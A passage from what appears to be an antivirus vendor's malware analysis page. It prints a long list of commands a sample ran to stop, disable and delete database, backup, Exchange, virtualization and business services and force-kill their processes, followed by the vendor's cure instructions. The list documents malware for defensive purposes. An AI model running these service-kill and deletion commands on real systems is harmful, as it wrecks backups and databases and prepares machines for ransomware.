  • '<SYSTEM32>\sc.exe' delete VMwareHostd
  • '<SYSTEM32>\sc.exe' delete RabbitMQ
  • '<SYSTEM32>\sc.exe' delete MSCRMAsyncService
  • '<SYSTEM32>\net1.exe' stop SQLWriter
  • '<SYSTEM32>\net1.exe' stop "MSSQLServerOLAPService"
  • '<SYSTEM32>\net1.exe' stop "NetBackup Proxy Service"
  • '<SYSTEM32>\sc.exe' delete VMUSBArbService
  • '<SYSTEM32>\cmd.exe' /c "color a & @net stop UIODetect & @net stop VMwareHostd & @net stop TeamViewer8 & @net stop VMUSBArbService & @net stop VMAuthdService & @net stop wanxiao-monitor & @net stop WebAttendServer ...
  • '<SYSTEM32>\net1.exe' stop "MSSQLServerADHelper100"
  • '<SYSTEM32>\sc.exe' delete OracleVssWriterORCL
  • '<SYSTEM32>\net1.exe' stop "ReportServer$SHOPCONTROL9"
  • '<SYSTEM32>\net1.exe' stop "MSSQLFDLauncher$SHOPCONTROL9"
  • '<SYSTEM32>\net1.exe' stop "SQLWrite"
  • '<SYSTEM32>\cmd.exe' /c "color b & @sc delete "UWS LoPriv Services" & @sc delete ftnlsv3 & @sc delete ftnlses3 & @sc delete FxService & @sc delete "UtilDev Web Server Pro" & @sc delete ftusbrdwks & @sc delete ftusb...
  • '<SYSTEM32>\net1.exe' stop "SSISTELEMETRY130"
  • '<SYSTEM32>\net1.exe' stop "MSSQL$SHOPCONTROL9"
  • '<SYSTEM32>\net1.exe' stop MSSQL$
  • '<SYSTEM32>\net1.exe' stop "MsDtsServer130"
  • '<SYSTEM32>\net1.exe' stop "MSOLAP$SHOPCONTROL9"
  • '<SYSTEM32>\sc.exe' config "SQL Server (MSSQLSERVER)" start=disabled
  • '<SYSTEM32>\net1.exe' stop "SQLTELEMETRY"
  • '<SYSTEM32>\net1.exe' stop "MSSQL$VEEAMSQL2012"
  • '<SYSTEM32>\sc.exe' config MSSQLSERVER start=disabled
  • '<SYSTEM32>\net1.exe' stop "SQLBrowser"
  • '<SYSTEM32>\net1.exe' stop "SQLSERVERAGENT"
  • '<SYSTEM32>\cmd.exe' /c "color b & @sc delete "DAService_TCP" & @sc delete "eCard-TTransServer" & @sc delete eCardMPService & @sc delete EnergyDataService & @sc delete UI0Detect & @sc delete K3MobileService & @sc d...
  • '<SYSTEM32>\cmd.exe' /c "color b & @sc delete "XT800Service_Personal" & @sc delete SQLSERVERAGENT & @sc delete SQLWriter & @sc delete SQLBrowser & @sc delete MSSQLFDLauncher & @sc delete MSSQLSERVER & @sc delete Qc...
  • '<SYSTEM32>\cmd.exe' /c "color b & @taskkill /IM DDSoftPwsTomcat9.exe /F & @taskkill /IM U8SmartClient.exe /F & @taskkill /IM U8SmartClientMonitor.exe /F & @taskkill /IM tomcat9.exe /F & @taskkill /IM SqlManagement...
  • '<SYSTEM32>\cmd.exe' /c "color b & @taskkill /IM Tomcat7w.exe /F & @taskkill /IM "UFSoft.U8.OC.QuartzScheduler.exe" /F & @taskkill /IM UFSoft.U8.OC.QuartzScheduler.exe /F & @taskkill /IM Launchpad.exe /F & @taskkil...
  • '<SYSTEM32>\cmd.exe' /c "color b & net stop "MSOLAP$SHOPCONTROL9" & net stop "MSSQL$SHOPCONTROL9" & net stop "MSSQLFDLauncher$SHOPCONTROL9" & net stop "ReportServer$SHOPCONTROL9" & net stop "SQLAgent$SHOPCONTROL9" ...
  • '<SYSTEM32>\cmd.exe' /c "color b & taskkill /F /IM Veeam.Backup.Agent.ConfigurationService.exe & taskkill /F /IM Veeam.Backup.BrokerService.exe & taskkill /F /IM Veeam.Backup.CatalogDataService.exe & taskkill /F /I...
  • '<SYSTEM32>\cmd.exe' /c "color b & sc config MSSQLSERVER start=disabled & sc config "SQL Server (MSSQLSERVER)" start=disabled & net stop MSSQL$ & sc config MSSQL$ start=disabled & net stop SQLSERVERAGENT & sc confi...
  • '<SYSTEM32>\cmd.exe' /c "color b & net stop "SQLSERVERAGENT" & net stop "SQLBrowser" & net stop "SQLTELEMETRY" & net stop "MsDtsServer130" & net stop "SSISTELEMETRY130" & net stop "SQLWrite" & net stop "MSSQL$VEEAM...
  • '<SYSTEM32>\cmd.exe' /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc ...
  • '<SYSTEM32>\sc.exe' delete MSSQLFDLauncher
  • '<SYSTEM32>\net1.exe' stop SQLBrowser
  • '<SYSTEM32>\sc.exe' config MSSQL$ start=disabled
  • '<SYSTEM32>\sc.exe' delete K3MobileService
  • '<SYSTEM32>\sc.exe' delete OracleOraDb11g_home1TNSListener
  • '<SYSTEM32>\sc.exe' delete QcSoftService
  • '<SYSTEM32>\cmd.exe' /c "color a & @net stop U8WorkerService1 & @net stop U8WorkerService2 & @net stop "memcached Server" & @net stop Apache2.4 & @net stop UFIDAWebService & @net stop MSComplianceAudit & @net stop ...
  • '<SYSTEM32>\sc.exe' delete OracleOraDb11g_home1ClrAgent
  • '<SYSTEM32>\sc.exe' delete UI0Detect
  • '<SYSTEM32>\sc.exe' delete MSSQLSERVER
  • '<SYSTEM32>\sc.exe' delete EnergyDataService
  • '<SYSTEM32>\cmd.exe' /c "color b & @taskkill /IM ReportingServicesService.exe /F & @sc delete "SQL Server Reporting Services" & @sc delete MSSQLFDLauncher & @taskkill /IM U8CEServer.exe /F & @taskkill /IM ServerNT....
  • '<SYSTEM32>\net1.exe' stop "NetBackup Discovery Framework"
  • '<SYSTEM32>\sc.exe' delete MSSQLServerOLAPService
  • '<SYSTEM32>\sc.exe' config SQLSERVERAGENT start=disabled
  • '<SYSTEM32>\sc.exe' delete eCardMPService
  • '<SYSTEM32>\sc.exe' delete SQLBrowser
  • '<SYSTEM32>\sc.exe' delete "eCard-TTransServer"
  • '<SYSTEM32>\net1.exe' stop "NetBackup Client Service"
  • '<SYSTEM32>\sc.exe' delete SQLWriter
  • '<SYSTEM32>\sc.exe' delete "DAService_TCP"
  • '<SYSTEM32>\net1.exe' stop SQLSERVERAGENT
  • '<SYSTEM32>\sc.exe' delete SQLSERVERAGENT
  • '<SYSTEM32>\cmd.exe' /c "@color b & sc delete MSCRMAsyncService & @sc delete REPLICA & @sc delete RTCATS & @sc delete RTCAVMCU & @sc delete RtcQms & @sc delete RTCMEETINGMCU & @sc delete RTCIMMCU & @sc delete RTCDA...
  • '<SYSTEM32>\net1.exe' stop "SQLAgent$SHOPCONTROL9"
  • '<SYSTEM32>\sc.exe' delete "XT800Service_Personal"
  • '<SYSTEM32>\net1.exe' stop MSExchangeEdgeSync
  • '<SYSTEM32>\sc.exe' delete VmAgentDaemon
  • '<SYSTEM32>\sc.exe' delete FxService
  • '<SYSTEM32>\sc.exe' delete smtpsvrJT
  • '<SYSTEM32>\net1.exe' stop "SQLAgent$PROGID"
  • '<SYSTEM32>\sc.exe' delete AlibabaProtect
  • '<SYSTEM32>\net1.exe' stop wanxiao-monitor
  • '<SYSTEM32>\net1.exe' stop MSExchangeDagMgmt
  • '<SYSTEM32>\sc.exe' delete TPlusStdUpgradeService1300
  • '<SYSTEM32>\sc.exe' config SQLANYs_Sage_FAS_Fixed_Assets start=disabled
  • '<SYSTEM32>\sc.exe' delete SPTimerV4
  • '<SYSTEM32>\net1.exe' stop DellDRLogSvc
  • '<SYSTEM32>\net1.exe' stop VMAuthdService
  • '<SYSTEM32>\net1.exe' stop "MSSQL$PROGID"
  • '<SYSTEM32>\sc.exe' delete MSMQ
  • '<SYSTEM32>\net1.exe' stop VMUSBArbService
  • '<SYSTEM32>\sc.exe' delete qemu-ga
  • '<SYSTEM32>\net1.exe' stop MSExchangeCompliance
  • '<SYSTEM32>\sc.exe' delete TPlusStdTaskService1300
  • '<SYSTEM32>\sc.exe' delete SPSearchHostController
  • '<SYSTEM32>\net1.exe' stop SQLANYs_Sage_FAS_Fixed_Assets
  • '<SYSTEM32>\net1.exe' stop TeamViewer8
  • '<SYSTEM32>\sc.exe' delete SQLTELEMETRY
  • '<SYSTEM32>\net1.exe' stop VMwareHostd
  • '<SYSTEM32>\sc.exe' delete secbizsrv
  • '<SYSTEM32>\net1.exe' stop "MSSQL$WOLTERSKLUWER"
  • '<SYSTEM32>\sc.exe' delete wwbizsrv
  • '<SYSTEM32>\net1.exe' stop WebAttendServer
  • '<SYSTEM32>\sc.exe' delete 360EntHttpServer
  • '<SYSTEM32>\sc.exe' delete "FontCache3.0.0.0"
  • '<SYSTEM32>\sc.exe' delete c2wts
  • '<SYSTEM32>\sc.exe' delete MMRHookService
  • '<SYSTEM32>\net1.exe' stop MSExchangeDiagnostics
  • '<SYSTEM32>\net1.exe' stop "MSSQLFDLauncher"
  • '<SYSTEM32>\net1.exe' stop "MSSQLFDLauncher$OPTIMA"
  • '<SYSTEM32>\sc.exe' delete LMS
  • '<SYSTEM32>\sc.exe' delete ProjectCalcService16
  • '<SYSTEM32>\net1.exe' stop JWEM3DBAUTORun
  • '<SYSTEM32>\sc.exe' delete 360EntSvc
  • '<SYSTEM32>\sc.exe' delete VirboxWebServer
  • '<SYSTEM32>\sc.exe' delete SPTraceV4
  • '<SYSTEM32>\sc.exe' delete kbasesrv
  • '<SYSTEM32>\sc.exe' delete jhi_service
  • '<SYSTEM32>\sc.exe' config MSSQL$VIM_SQLEXP start=disabled
  • '<SYSTEM32>\sc.exe' delete OSearch16
  • '<SYSTEM32>\net1.exe' stop FirebirdGuardianDeafaultInstance
  • '<SYSTEM32>\net1.exe' stop "SQLAgent$WOLTERSKLUWER"
  • '<SYSTEM32>\sc.exe' delete zyb_sync
  • '<SYSTEM32>\sc.exe' delete ZTEVdservice
  • '<SYSTEM32>\net1.exe' stop MSExchangeDelivery
  • '<SYSTEM32>\net1.exe' stop MSSQL$VIM_SQLEXP
  • '<SYSTEM32>\net1.exe' stop mysqltransport
  • '<SYSTEM32>\sc.exe' delete ftnlses3
  • '<SYSTEM32>\net1.exe' stop MSExchangeAntispamUpdate
  • '<SYSTEM32>\sc.exe' delete SPAdminV4
  • '<SYSTEM32>\sc.exe' delete "ZTE USBIP Client Guard"
  • '<SYSTEM32>\sc.exe' delete SSSyncService
  • '<SYSTEM32>\net1.exe' stop HaoZipSvc
  • '<SYSTEM32>\sc.exe' delete RTCCDR
  • '<SYSTEM32>\net1.exe' stop U8WorkerService2
  • '<SYSTEM32>\cmd.exe' /c "color e & @taskkill /IM VBoxSDS.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM TeamViewer_Service.exe /F & @taskkill /IM TeamViewer.exe /F & @taskkill /IM CasLicenceServer.exe /F & @t...
  • '<SYSTEM32>\net1.exe' stop U8WorkerService1
  • '<SYSTEM32>\sc.exe' delete OpenSSHd
  • '<SYSTEM32>\net1.exe' stop "SQLTELEMETRY$HL"
  • '<SYSTEM32>\net1.exe' stop "memcached Server"
  • '<SYSTEM32>\cmd.exe' /c "color e & @taskkill /IM BackupExec.exe /F & @taskkill /IM Att.exe /F & @taskkill /IM mdm.exe /F & @taskkill /IM BackupExecManagementService.exe /F & @taskkill /IM bengine.exe /F & @taskkill...
  • '<SYSTEM32>\sc.exe' delete ftusbrdsrv
  • '<SYSTEM32>\cmd.exe' /c "color e & @taskkill /IM pg_ctl.exe /F & @taskkill /IM rcrelay.exe /F & @taskkill /IM SogouImeBroker.exe /F & @taskkill /IM CCenter.exe /F & @taskkill /IM ScanFrm.exe /F & @taskkill /IM d_ma...
  • '<SYSTEM32>\sc.exe' delete SSMonitorService
  • '<SYSTEM32>\sc.exe' delete RTCDATAMCU
  • '<SYSTEM32>\sc.exe' delete ftusbrdwks
  • '<SYSTEM32>\net1.exe' stop "ReportServer"
  • '<SYSTEM32>\sc.exe' delete "Sense Shield Service"
  • '<SYSTEM32>\cmd.exe' /c "color e & @taskkill /IM ThunderPlatform.exe /F & @taskkill /IM iexplore.exe /F & @taskkill /IM vm-agent.exe /F & @taskkill /IM vm-agent-daemon.exe /F & @taskkill /IM eSightService.exe /F & ...
  • '<SYSTEM32>\sc.exe' delete "UtilDev Web Server Pro"
  • '<SYSTEM32>\net1.exe' stop vmvss
  • '<SYSTEM32>\sc.exe' delete "Kiwi Syslog Server"
  • '<SYSTEM32>\sc.exe' delete SQLAgent$SQL2008
  • '<SYSTEM32>\sc.exe' delete "UWS HiPriv Services"
  • '<SYSTEM32>\sc.exe' delete eSightService
  • '<SYSTEM32>\net1.exe' stop UIODetect
  • '<SYSTEM32>\sc.exe' config MSSQL$FE_EXPRESS start= disabled
  • '<SYSTEM32>\net1.exe' stop "Synology Drive VSS Service x64"
  • '<SYSTEM32>\net1.exe' stop MSSQL$RE_EXPRESS
  • '<SYSTEM32>\sc.exe' delete Jenkins
  • '<SYSTEM32>\sc.exe' delete "ZTE FileTranS"
  • '<SYSTEM32>\net1.exe' stop Apache2.2
  • '<SYSTEM32>\sc.exe' delete ProjectQueueService16
  • '<SYSTEM32>\sc.exe' delete MSSQL$SQL2008
  • '<SYSTEM32>\net1.exe' stop MSExchangeADTopology
  • '<SYSTEM32>\net1.exe' stop XenSvc
  • '<SYSTEM32>\net1.exe' stop "TMBMServer"
  • '<SYSTEM32>\net1.exe' stop xenlite
  • '<SYSTEM32>\sc.exe' config vmvss start=disabled
  • '<SYSTEM32>\net1.exe' stop MSSQL$FE_EXPRESS
  • '<SYSTEM32>\sc.exe' delete apachezt
  • '<SYSTEM32>\sc.exe' delete "ZTE USBIP Client"
  • '<SYSTEM32>\net1.exe' stop UFIDAWebService
  • '<SYSTEM32>\sc.exe' delete TPlusStdAppService1300
  • '<SYSTEM32>\net1.exe' stop Realtek11nSU
  • '<SYSTEM32>\sc.exe' delete ProjectEventService16
  • '<SYSTEM32>\net1.exe' stop Apache2.4
  • '<SYSTEM32>\net1.exe' stop "igfxCUIService2.0.0.0"
  • '<SYSTEM32>\net1.exe' stop MSComplianceAudit
  • '<SYSTEM32>\net1.exe' stop K3ClouManager
  • '<SYSTEM32>\cmd.exe' /c "%TEMP%\4EDA.tmp\4EDB.tmp\4EDC.bat <Full path to file>"' (with hidden window)

Curing recommendations

  1. If the operating system (OS) can be loaded (either normally or in safe mode), download Dr.Web Security Space and run a full scan of your computer and removable media you use. More about Dr.Web Security Space.
  2. If you cannot boot the OS, change the BIOS settings to boot your system from a CD or USB drive. Download the image of the emergency system repair disk Dr.Web® LiveDisk , mount it on a USB drive or burn it to a CD/DVD. After booting up with this media, run a full scan and cure all the detected threats.
Free trial

 

Download Dr.Web

Download by serial number

Use Dr.Web Anti-virus for macOS to run a full scan of your Mac.

Free trial

 

Download Dr.Web

Download by serial number

Download on App Store

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

 

Download Dr.Web

Download by serial number

  1. If the mobile device is operating normally, download and install Dr.Web for Android. Run a full system scan and follow recommendations to neutralize the detected threats.
  2. If the mobile device has been locked by Android.Locker ransomware (the message on the screen tells you that you have broken some law or demands a set ransom amount; or you will see some other announcement that prevents you from using the handheld normally), do the following:
    • Load your smartphone or tablet in the safe mode (depending on the operating system version and specifications of the particular mobile device involved, this procedure can be performed in various ways; seek clarification from the user guide that was shipped with the device, or contact its manufacturer);
    • Once you have activated safe mode, install the Dr.Web for Android onto the infected handheld and run a full scan of the system; follow the steps recommended for neutralizing the threats that have been detected;
    • Switch off your device and turn it on as normal.

Find out more about Dr.Web for Android

Free trial

14 days

Download now
Get it on Google Play